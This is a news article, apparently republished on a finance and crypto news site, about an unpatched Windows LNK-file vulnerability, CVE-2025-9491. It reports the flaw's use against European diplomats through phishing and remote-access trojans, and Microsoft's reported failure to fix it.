You might assume that high-risk security vulnerabilities that have been reported by expert security researchers would be fixed as quickly as possible by the affected companies, especially if those vulnerabilities are actively being exploited in the wild. That just makes sense.
Apparently not. One particular security flaw in Windows has not only existed for over eight years, but has been actively exploited ever since… and yet Microsoft refuses to fix it.
The security vulnerability, explained
The flaw in question is a zero-day vulnerability with designation CVE-2025-9491, which affects the processing of LNK files on Windows and has already been exploited thousands of times.
A recent blog post by researchers from Arctic Wolf brought renewed attention to this issue, who discovered that a hacker group has used CVE-2025-9491 for attacks again. The target was apparently several EU countries, with hackers repeatedly using the flaw to target diplomats. The most recent attacks occurred in Belgium, Hungary, Italy, Serbia, and the Netherlands at the end of 2024.
The method of attack is relatively simple as the attackers only need to deliver a malicious file to a target device (e.g., via phishing emails). The person must then open the file, which allows the execution of malicious code that can be used for, say, espionage.
In the latest wave of attacks, the hackers apparently attempted to inject a Trojan virus that enables remote access on affected devices, allowing the execution of a wide variety of commands. In the past, hacker groups from China, Iran, North Korea, and Russia have used this method to circulate malicious files, according to a report by Trend Micro.
Why isn’t Microsoft taking action?
According to security researchers, Microsoft was previously informed of the vulnerability via Trend ZDI’s bug bounty program yet still hasn’t done anything to address it. It’s unclear why Microsoft doesn’t want to—or can’t—patch a high-risk flaw that’s actively exploited.
As a result, further attacks are likely to occur. Windows system admins are therefore advised to block the execution of LNK files from unknown sources until further notice.
This articles is written by : Nermeen Nabil Khear Abdelmalak
All rights reserved to : USAGOLDMIES . www.usagoldmines.com
You can Enjoy surfing our website categories and read more content in many fields you may like .
Why USAGoldMines ?
USAGoldMines is a comprehensive website offering the latest in financial, crypto, and technical news. With specialized sections for each category, it provides readers with up-to-date market insights, investment trends, and technological advancements, making it a valuable resource for investors and enthusiasts in the fast-paced financial world.